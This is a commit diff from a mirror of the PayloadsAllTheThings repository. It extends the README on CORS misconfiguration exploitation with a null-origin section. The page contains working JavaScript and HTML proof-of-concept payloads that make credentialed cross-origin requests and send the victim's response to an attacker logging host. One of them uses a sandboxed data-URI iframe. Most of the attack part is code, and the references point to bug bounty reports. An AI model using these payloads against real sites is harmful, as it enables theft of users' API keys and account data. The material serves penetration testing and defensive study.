ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added: CORS Misconfiguration with Null Origin allowed

Browse Source
This commit is contained in:
Emanuel Duss 2020-04-12 14:29:10 +02:00
parent 930a3a0d8c
commit 4537555714
1 changed files with 133 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

223
CORS Misconfiguration/README.md
View File

@ -1,90 +1,133 @@
# CORS Misconfiguration # CORS Misconfiguration
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials. > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials.
## Summary ## Summary
* [Prerequisites](#prerequisites) * [Prerequisites](#prerequisites)
* [Exploitation](#exploitation) * [Exploitation](#exploitation)
* [References](#references) * [References](#references)
## Prerequisites ## Prerequisites
* BURP HEADER> `Origin: https://evil.com` * BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true` * VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
## Exploitation ## Exploitation
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
### Vulnerable example ### Vulnerable Example: Origin Reflection
```powershell #### Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: victim.example.com ```powershell
Origin: https://evil.com GET /endpoint HTTP/1.1
Cookie: sessionid=... Host: victim.example.com
Origin: https://evil.com
HTTP/1.1 200 OK Cookie: sessionid=...
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
{"[private API key]"} Access-Control-Allow-Credentials: true
```
{"[private API key]"}
### Proof of concept ```
```js #### Proof of concept
var req = new XMLHttpRequest();
req.onload = reqListener; ```js
req.open('get','https://victim.example.com/endpoint',true); var req = new XMLHttpRequest();
req.withCredentials = true; req.onload = reqListener;
req.send(); req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
function reqListener() { req.send();
location='//atttacker.net/log?key='+this.responseText;
}; function reqListener() {
``` location='//atttacker.net/log?key='+this.responseText;
};
or ```
```html or
<html>
<body> ```html
<h2>CORS PoC</h2> <html>
<div id="demo"> <body>
<button type="button" onclick="cors()">Exploit</button> <h2>CORS PoC</h2>
</div> <div id="demo">
<script> <button type="button" onclick="cors()">Exploit</button>
function cors() { </div>
var xhr = new XMLHttpRequest(); <script>
xhr.onreadystatechange = function() { function cors() {
if (this.readyState == 4 && this.status == 200) { var xhr = new XMLHttpRequest();
document.getElementById("demo").innerHTML = alert(this.responseText); xhr.onreadystatechange = function() {
} if (this.readyState == 4 && this.status == 200) {
}; document.getElementById("demo").innerHTML = alert(this.responseText);
xhr.open("GET", }
"https://victim.example.com/endpoint", true); };
xhr.withCredentials = true; xhr.open("GET",
xhr.send(); "https://victim.example.com/endpoint", true);
} xhr.withCredentials = true;
</script> xhr.send();
</body> }
</html> </script>
``` </body>
</html>
## Bug Bounty reports ```
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) ### Vulnerable Example: Null Origin
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) #### Vulnerable Implementation
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) It's possible that the server does not reflect the complete `Origin` header but
that the `null` origin is allowed. This would look like this in the server's
## References response:
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) ```
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) GET /endpoint HTTP/1.1
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) Host: victim.example.com
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) Origin: null
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept
This can be exploited by putting the attack code into an iframe using the data
URI scheme. If the data URI scheme is used, the browser will use the `null`
origin in the request:
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest ();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
```
## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
## References
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)